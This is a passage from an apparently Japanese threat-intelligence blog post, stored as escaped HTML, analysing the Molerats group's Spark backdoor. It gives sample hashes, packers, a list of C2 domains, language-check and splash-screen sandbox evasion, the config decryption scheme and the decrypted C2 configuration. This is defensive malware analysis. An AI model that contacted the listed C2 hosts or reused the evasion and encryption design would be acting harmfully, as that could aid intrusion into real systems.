dapoerwedding[.]com\u304a\u3088\u3073servicebios[.]comMolerats\u306e\u6700\u521d\u306e\u691c\u67fb\u6642\u306b\u306f\u3001\u4ee5\u524d\u6587\u66f8\u5316\u3055\u308c\u305fMolerats\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3068\u306e\u3064\u306a\u304c\u308a\u306f\u78ba\u8a8d\u3055\u308c\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u30012\u3064\u306e\u30c9\u30e1\u30a4\u30f3\u306b\u306f\u6b21\u306b\u793a\u3059\u3044\u304f\u3064\u304b\u306e\u5171\u901a\u70b9(T1347<\/a>)\u304c\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n
    \n
  1. \u65e2\u5b58\u306e\u30c9\u30e1\u30a4\u30f3<\/li>\n
  2. \u4e00\u898b\u3059\u308b\u3068\u6b63\u898f\u306e\u5c65\u6b74\u30b3\u30f3\u30c6\u30f3\u30c4\u3067\u3042\u308b<\/li>\n
  3. \u6700\u8fd1\u671f\u9650\u5207\u308c\u3068\u306a\u3063\u305f(\u30c9\u30e1\u30a4\u30f3\u306e\u511f\u9084\u7336\u4e88\u671f\u9593\u3082\u7d4c\u904e\u3057\u305f)<\/li>\n
  4. \u671f\u9650\u5207\u308c\u5f8c\u306e\u767b\u9332\u8005(T1328<\/a>)\u304cNameCheap, Inc.\u3068\u306a\u3063\u3066\u3044\u308b<\/li>\n
  5. Domain Validation(DV)\u306eSSL\u8a3c\u660e\u66f8\u306e\u8a2d\u5b9a(T1337<\/a>)\u304c\u3001Sectigo\u306b\u3088\u3063\u3066\u767a\u884c\u3055\u308c\u3066\u3044\u308b<\/li>\n<\/ol>\n
    \u4e0a\u8a18\u306b\u793a\u3057\u305f\u5171\u901a\u70b9\u3092\u6301\u3064\u5225\u306e\u914d\u4fe1\u30c9\u30e1\u30a4\u30f3(zmartco[.]com)\u306f\u3001\u524d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305f\u88681\u306b\u793a\u3055\u308c\u3066\u3044\u308b\"Pictures.pdf\"\u914d\u4fe1\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u306b\u95a2\u9023\u3057\u307e\u3059\u3002<\/p>\n
    <\/a>Operation Parliament\u306b\u95a2\u4fc2\u3057\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9<\/h2>\n
    \u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u3001Molerats\u304c\u591a\u304f\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u7528\u3044\u3066\u3044\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002\u3064\u3044\u6700\u8fd1\u307e\u3067\u3001\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u306b\u306f\u72ec\u81ea\u306e\u540d\u524d\u304c\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001\u5148\u65e5\u3001Cybereason\u306b\u3088\u3063\u3066\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u306b\"Spark\"\u3068\u3044\u3046\u540d\u524d\u304c\u4ed8\u3051\u3089\u308c\u307e\u3057\u305f<\/a>\u3002Cybereason\u306e\u30d6\u30ed\u30b0\u3067\u8a00\u53ca\u3055\u308c\u3001\u5947\u864e360\u306e\u30d6\u30ed\u30b0<\/a>\u3067\u3082\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f2019\u5e741\u6708\u306b\u767a\u751f\u3057\u305f\u653b\u6483\u3067\u3082\u914d\u4fe1\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u5f0a\u793e\u306e\u8abf\u67fb\u306b\u3088\u308b\u3068\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f\u30ab\u30b9\u30da\u30eb\u30b9\u30ad\u30fc\u306b\u3088\u3063\u3066\u5831\u544a\u3055\u308c\u305fOperation Parliament\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u4e3b\u8981\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3042\u3063\u305f\u305f\u3081\u3001\u5c11\u306a\u304f\u3068\u30822017\u5e74\u524d\u534a\u304b\u3089\u3001Molerats\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n
    Spark\u306f\u3001HTTP POST\u8981\u6c42\u3092\u4f7f\u7528\u3057\u3066C2\u30b5\u30fc\u30d0\u30fc\u3068\u901a\u4fe1\u3057\u3066\u3001\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u308a\u3001\u305d\u306e\u7d50\u679c\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u3059\u3079\u3066\u304cJSON\u69cb\u9020\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u307b\u3068\u3093\u3069\u306e\u5834\u5408\u3001\u653b\u6483\u8005\u306f\u5546\u7528\u30d1\u30c3\u30ab\u30fc\u3092\u4f7f\u7528\u3057\u3066Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u96e3\u8aad\u5316\u3057\u3001\u691c\u51fa\u3092\u56de\u907f\u3057\u307e\u3059\u3002\u8abf\u67fb\u306e\u6bb5\u968e\u3067\u3001\u653b\u6483\u8005\u304cEnigma Protector\u3001Themida\u3001\u304a\u3088\u3073VMProtect\u3092\u4f7f\u7528\u3057\u3066\u3001\u30b5\u30f3\u30d7\u30eb\u306e\u8b58\u5225\u3092\u56f0\u96e3\u306b\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u307e\u305f\u3001\u5f0a\u793e\u3067\u306f\u958b\u767a\u8005\u304c\u30d0\u30a4\u30ca\u30ea\u306b\u6b8b\u3057\u305fSpark\u30d9\u30fc\u30b9\u306e\u8b58\u5225\u5b50\u306e2\u3064\u306e\u7570\u306a\u308b\u30d0\u30fc\u30b8\u30e7\u30f3(2.2\u304a\u3088\u30734.2)\u3092\u7279\u5b9a\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u8b58\u5225\u53ef\u80fd\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u6587\u5b57\u5217\u3092\u6301\u3064Spark\u30b5\u30f3\u30d7\u30eb\u306b\u3088\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u306b\u57fa\u3065\u3044\u3066\u5224\u65ad\u3059\u308b\u3068\u3001\u30d0\u30fc\u30b8\u30e7\u30f32.2\u306f2017\u5e74\u306b\u4f5c\u6210\u3055\u308c\u3001\u30d0\u30fc\u30b8\u30e7\u30f34.2\u306f2019\u5e7412\u6708\u304a\u3088\u30732020\u5e741\u6708\u306b\u4f5c\u6210\u3055\u308c\u305f\u3068\u307f\u3089\u308c\u307e\u3059\u3002\u88682\u306f\u3001\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3092\u6301\u3064\u3053\u308c\u3089\u306eSpark\u30b5\u30f3\u30d7\u30eb\u3092\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u304a\u3088\u3073\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u96e3\u8aad\u5316\u306b\u4f7f\u7528\u3055\u308c\u305f\u30d1\u30c3\u30ab\u30fc\u3068\u3068\u3082\u306b\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n
    \u5207\u308a\u6368\u3066\u3089\u308c\u305fSHA256<\/strong><\/td>\n\u30d0\u30fc\u30b8\u30e7\u30f3<\/strong><\/td>\n\u30b3\u30f3\u30d1\u30a4\u30eb\u65e5<\/strong><\/td>\n\u30d1\u30c3\u30ab\u30fc<\/strong><\/td>\n<\/tr>\n
    966ad6452793b15..<\/td>\n2.2<\/td>\n2017-05-24 6:15:04<\/td>\nVMProtect<\/td>\n<\/tr>\n
    ab4e43b4e526d44..<\/td>\n2.2<\/td>\n2017-05-24 6:15:04<\/td>\nVMProtect<\/td>\n<\/tr>\n
    212aa6e3f236550..<\/td>\n2.2<\/td>\n2017-05-24 6:15:04<\/td>\nVMProtect<\/td>\n<\/tr>\n
    cf32479ed30ae95..<\/td>\n4.2<\/td>\n2019-12-30 9:45:44<\/td>\n\u306a\u3057<\/td>\n<\/tr>\n
    d0dc1de0ae912c7..<\/td>\n4.2<\/td>\n2020-01-12 10:57:50<\/td>\nEnigma<\/td>\n<\/tr>\n
    04fa6aaea5e3a26..<\/td>\n4.2<\/td>\n2020-01-12 10:57:50<\/td>\nEnigma<\/td>\n<\/tr>\n
    6e60f5c65299ee7..<\/td>\n4.2<\/td>\n2020-01-12 10:57:50<\/td>\nEnigma<\/td>\n<\/tr>\n
    b08b8fddb9dd940..<\/td>\n4.2<\/td>\n2020-01-12 10:57:50<\/td>\nEnigma<\/td>\n<\/tr>\n
    64ea1f1e0352f3d..<\/td>\n4.2<\/td>\n2020-01-12 10:57:50<\/td>\nEnigma<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    \u88682. Spark\u30b5\u30f3\u30d7\u30eb\u3068\u305d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u3001\u304a\u3088\u3073\u4f7f\u7528\u3055\u308c\u305f\u30d1\u30c3\u30ab\u30fc<\/em><\/span><\/p>\n
    \u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b\u304c2017\u5e743\u6708\u304b\u30892020\u5e741\u6708\u306e\u591a\u6570\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5f0a\u793e\u304c\u53ce\u96c6\u3057\u305f\u3068\u3053\u308d\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u304c\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u7d043\u5e74\u306b\u308f\u305f\u3063\u3066\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u4f7f\u7528\u3057\u3066\u304d\u305f\u3053\u3068\u304c\u793a\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u5404\u30d5\u30a1\u30a4\u30eb\u304b\u3089\u69cb\u6210\u3092\u5c55\u958b\u3057\u3001Spark\u306b\u95a2\u9023\u3057\u305f\u65e2\u77e5\u306eC2\u30c9\u30e1\u30a4\u30f3\u3092\u96c6\u3081\u3001\u88683\u306b\u307e\u3068\u3081\u307e\u3057\u305f\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    \u30c9\u30e1\u30a4\u30f3<\/strong><\/td>\n\u6700\u521d\u306e\u4f7f\u7528<\/strong><\/td>\n<\/tr>\n
    webtutorialz[.]com<\/td>\n2020\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n
    nysura[.]com<\/td>\n2020\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n
    laceibagrafica[.]com<\/td>\n2019\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    motoqu[.]com<\/td>\n2019\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    smartweb9[.]com<\/td>\n2019\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n
    laptower[.]com<\/td>\n2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    app.msexchanges16[.]com<\/td>\n2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    msexchange13[.]com<\/td>\n2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    cloudserviceapi[.]online<\/td>\n2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    updates.masterservices[.]online<\/td>\n2018\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    clients.itresolver[.]online<\/td>\n2018\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n
    update.itresolver[.]online<\/td>\n2018\u5e74\u4e0a\u534a\u671f<\/td>\n<\/tr>\n
    91.219.237[.]99<\/td>\n2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    goldenlines[.]site<\/td>\n2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n
    update.nextdata[.]site<\/td>\n2017\u5e74\u4e0b\u534a\u671f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    \u88683. Spark C2\u30c9\u30e1\u30a4\u30f3\u304a\u3088\u3073\u3053\u308c\u3089\u304c\u4f7f\u7528\u3055\u308c\u305f\u304a\u304a\u3088\u305d\u306e\u6642\u671f<\/em><\/span><\/p>\n
    \u6b21\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001Spark\u306e\u6a5f\u80fd\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u30012019\u5e7411\u6708\u306e\u653b\u6483\u3067Pictures.pdf\u6587\u66f8\u306b\u3088\u3063\u3066\u914d\u4fe1\u3055\u308c\u305f\"pdf.exe\"\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5206\u6790\u304b\u3089\u5224\u5b9a\u3055\u308c\u305fC2\u30c1\u30e3\u30cd\u30eb\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n
    <\/a>2019\u5e7411\u6708\u306e\u653b\u6483\u306b\u304a\u3051\u308bPictures.pdf\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9<\/h2>\n
    \u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u5546\u7528\u306eEnigma Protector<\/a> (T1045<\/a>)\u3067\u30d1\u30c3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30d1\u30c3\u30af\u3059\u308b\u969b\u3001Enigma Protector\u5185\u306e\"\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u9762\"<\/a>\u3068\u547c\u3070\u308c\u308b\u6a5f\u80fd\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306f\u3001\u3059\u3079\u3066\u306e\u30a6\u30a3\u30f3\u30c9\u30a6\u306e\u4e0a\u90e8\u306b\u753b\u50cf\u3092\u8868\u793a\u3059\u308b\u3088\u3046\u69cb\u6210\u3057\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u753b\u50cf\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u307e\u3067\u5f85\u6a5f\u3057\u3066\u304b\u3089\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u56f35\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u524d\u306bEnigma Protector\u306b\u3088\u3063\u3066\u8868\u793a\u3055\u308c\u305f\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u50cf\u3067\u3059\u304c\u3001\u3053\u306e\u753b\u50cf\u306fwallpaperswide.com\u304b\u3089\u5165\u624b\u3067\u304d\u308b<\/a>\u58c1\u7d19\u3067\u3059\u3002\u30b9\u30d7\u30e9\u30c3\u30b7\u30e5\u753b\u9762\u6a5f\u80fd\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u524d\u306b\u30e6\u30fc\u30b6\u30fc\u306b\u3088\u308b\u753b\u9762\u306e\u30af\u30ea\u30c3\u30af\u3068\u3044\u3046\u64cd\u4f5c\u304c\u5fc5\u8981\u3068\u306a\u308b\u305f\u3081\u3001\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306e\u56de\u907f\u624b\u6cd5\u3068\u3057\u3066\u6a5f\u80fd\u3057\u307e\u3059\u3002<\/p>\n
    \"Figure<\/span><\/p>\n
    \u56f35. \u60aa\u610f\u306e\u3042\u308bPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8<\/span><\/p>\n
    \u30a2\u30f3\u30d1\u30c3\u30af\u5f8c\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u6a5f\u80fd\u9762\u3067Operation Parliament\u3067\u914d\u4fe1\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u985e\u4f3c\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u653b\u6483\u8005\u304c\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u3067\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u3066\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002<\/p>\n
    \u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u306f\u3001\u6700\u521d\u306bGetKeyboardLayoutList\u306e\u7d50\u679c\u3068GetLocaleInfoA\u304b\u3089\u8fd4\u3055\u308c\u308b\u8a00\u8a9e\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3001\"arabic\"\u3068\u3044\u3046\u5358\u8a9e\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u3053\u308c\u30892\u3064\u306eAPI\u30b3\u30fc\u30eb\u306e\u7d50\u679c\u306b\u3053\u306e\u5358\u8a9e\u304c\u898b\u3064\u304b\u3089\u306a\u304b\u3063\u305f\u5834\u5408\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3057\u307e\u305b\u3093\u3002\u7279\u5b9a\u306e\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u8a00\u8a9e\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u306e\u306f\u3001\u653b\u6483\u8005\u306e\u6a19\u7684\u3068\u306a\u308b\u88ab\u5bb3\u7aef\u672b\u306b\u306f\u3053\u306e\u69cb\u6210\u304c\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3067\u3001\u3053\u306e\u69cb\u6210\u304c\u3055\u308c\u3066\u3044\u306a\u3044\u5206\u6790\u30b7\u30b9\u30c6\u30e0\u3067\u5b9f\u884c\u3055\u308c\u308b\u306e\u3092\u907f\u3051\u308b\u3053\u3068\u3092\u76ee\u7684\u3068\u3057\u305f\u3001\u65e2\u77e5\u306e\u56de\u907f\u6280\u6cd5\u3067\u3059\u3002<\/p>\n
    \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u653b\u6483\u8005\u306e\u6a19\u7684\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u9069\u5207\u306a\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u8a00\u8a9e\u30d1\u30c3\u30af\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3059\u308b\u3068\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u5185\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u69cb\u6210\u3067\u6307\u5b9a\u3055\u308c\u305fC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u3092\u8a66\u307f\u307e\u3059\u3002\u57cb\u3081\u8fbc\u307e\u308c\u305f\u69cb\u6210\u306f\u6697\u53f7\u5316\u3055\u308c\u3066\u304a\u308a\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306b\u30ab\u30b9\u30bf\u30e0\u306erolling XOR\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3053\u308c\u3092\u5fa9\u53f7\u3057\u3001\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306e\u30ad\u30fc\u304a\u3088\u3073\u30d0\u30c3\u30d5\u30a1\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u305d\u306e\u7d50\u679c\u3001base64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u3068\u307f\u3089\u308c\u308b\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30ad\u30fc\u306eSHA256\u30cf\u30c3\u30b7\u30e5\u304c\u751f\u6210\u3055\u308c\u3001\u7d50\u679c\u306e\u30cf\u30c3\u30b7\u30e5\u306e4\u756a\u76ee\u304b\u308928\u756a\u76ee\u306e\u30d0\u30a4\u30c8\u304c\u6700\u7d42\u30ad\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30c8\u30ea\u30d7\u30ebDES (3DES)\u3092\u4f7f\u7528\u3057\u3066\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092base64\u30c7\u30b3\u30fc\u30c9\u3057\u3001\u6700\u7d42\u30ad\u30fc\u3092\u4f7f\u7528\u3057\u3066\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001JSON\u3067\u69cb\u9020\u5316\u3055\u308c\u305f\u69cb\u6210\u304c\u751f\u3058\u307e\u3059\u3002\u3053\u306e\u7279\u7570\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u3001\u4ee5\u4e0b\u306e\u88683\u306b\u793a\u3059\u30ad\u30fc\u3068\u5024\u304c\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n\n
    JSON\u30d5\u30a3\u30fc\u30eb\u30c9<\/strong><\/td>\nJSON\u5024<\/strong><\/td>\n\u8aac\u660e<\/strong><\/td>\n<\/tr>\n
    xBql<\/td>\nlaceibagrafica[.]com<\/td>\nC2\u30b5\u30fc\u30d0\u30fc\u306e\u30db\u30b9\u30c8\u540d<\/td>\n<\/tr>\n
    eauy<\/td>\n\/<\/td>\nC2\u30b5\u30fc\u30d0\u30fc\u306eURI<\/td>\n<\/tr>\n
    Qnd<\/td>\n80<\/td>\nC2\u30b5\u30fc\u30d0\u30fc\u306eTCP\u30dd\u30fc\u30c8<\/td>\n<\/tr>\n
    jJN<\/td>\n0<\/td>\n\u30e1\u30a4\u30f3C2\u901a\u4fe1\u30eb\u30fc\u30d7\u306b\u5165\u308b\u307e\u3067\u306e\u30b9\u30ea\u30fc\u30d7\u9593\u9694<\/td>\n<\/tr>\n
    rlOa<\/td>\n<\u7a7a\u306e\u6587\u5b57\u5217><\/td>\n\u4e0d\u660e\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u3044\u3068\u307f\u3089\u308c\u308b<\/td>\n<\/tr>\n
    Eb<\/td>\n1<\/td>\n\u76ee\u7684\u4e0d\u660e\u3060\u304c\u3001BrandentlK\u30d5\u30a3\u30fc\u30eb\u30c9\u306eC2\u306b\u9001\u4fe1\u3055\u308c\u3066\u3044\u308b<\/td>\n<\/tr>\n
    BGa<\/td>\nvcJbq6nzgJk=<\/td>\n\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305fbase64\u3067\u6697\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u3067\u3001\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u8b58\u5225\u5b50\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3068\u307f\u3089\u308c\u308b\"Nickname\"\u30d5\u30a3\u30fc\u30eb\u30c9<\/td>\n<\/tr>\n
    qJk<\/td>\n10000<\/td>\n\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u7d42\u4e86\u3059\u308b\u307e\u3067\u306e\u30e1\u30a4\u30f3C2\u901a\u4fe1\u30eb\u30fc\u30d7\u306e\u7e70\u308a\u8fd4\u3057\u306e\u6570<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    \u88683. \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u69cb\u6210\u5185\u3067\u306eJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2<\/em><\/span><\/p>\n
    \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u540c\u3058\u30eb\u30fc\u30c1\u30f3\u3092\u4f7f\u7528\u3057\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30d0\u30c3\u30d5\u30a1\u3092\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u306e\u30eb\u30fc\u30c1\u30f3\u306b\u306f\u30b9\u30ea\u30fc\u30d7\u9593\u9694\u304c\u542b\u307e\u308c\u3001\u3055\u3089\u306b\u91cd\u8981\u306a\u3053\u3068\u306b\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u3084\u3001\u3053\u308c\u3089\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u5fa9\u53f7\u306b\u4f7f\u7528\u3055\u308c\u308b\u30ad\u30fc\u3092\u69cb\u9020\u5316\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\u540d(\u30d5\u30a1\u30fc\u30b9\u30c8 \u30cd\u30fc\u30e0)\u306e\u30ea\u30b9\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u88684\u306b\u793a\u3059\u540d\u3092\u3001C2\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u5185\u306eJSON\u30ad\u30fc\u306e\u540d\u524d\u304a\u3088\u3073\u5024\u3068\u3057\u3066\u4f7f\u7528\u3057\u307e\u3059\u3002\u4ed8\u9332\u3067\u306f\u3001\u3053\u306e\u5fa9\u53f7\u3055\u308c\u305f\u30d0\u30c3\u30d5\u30a1\u306e\u5404\u8981\u7d20\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002\u307e\u305f\u3001\u88684\u306e\u540d\u304cC2\u901a\u4fe1\u3067\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3055\u308c\u308b\u304b\u3082\u3053\u306e\u30d6\u30ed\u30b0\u306e\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u3002\u958b\u767a\u8005\u304c\u5404\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u540d\u524d\u304a\u3088\u3073\u30ad\u30fc\u3092\u5909\u66f4\u3059\u308b\u305f\u3081\u3001\u88684\u306e\u305d\u308c\u305e\u308c\u306e\u5024\u306f\u3001Spark\u30b5\u30f3\u30d7\u30eb\u3054\u3068\u306b\u4e00\u610f\u306e\u3082\u306e\u3067\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n\n
    Lawrence<\/td>\nAlanih<\/td>\nNevaeh<\/td>\nGarrison<\/td>\nReeceWNM<\/td>\n<\/tr>\n
    Allier<\/td>\nAverizt<\/td>\nLondonzO<\/td>\nZeke<\/td>\nMorganE<\/td>\n<\/tr>\n
    JaseN<\/td>\nMathiasNbo<\/td>\nJoslynKe<\/td>\nReesefP<\/td>\nWinston<\/td>\n<\/tr>\n
    Ivory<\/td>\nBrandentlK<\/td>\nAngelxEv<\/td>\nFrederickT<\/td>\nJessicay<\/td>\n<\/tr>\n
    Jonas<\/td>\nAdalynngS<\/td>\nZaydenlnL<\/td>\nKaileeXws<\/td>\nVanessaFM<\/td>\n<\/tr>\n
    Reginacy<\/td>\nAdelineRD<\/td>\nHoustonod<\/td>\nEverlyY<\/td>\nJordanlzw<\/td>\n<\/tr>\n
    TrumanRd<\/td>\nCollinsPM<\/td>\nMaximiliano<\/td>\nCallieVK<\/td>\nAryana<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
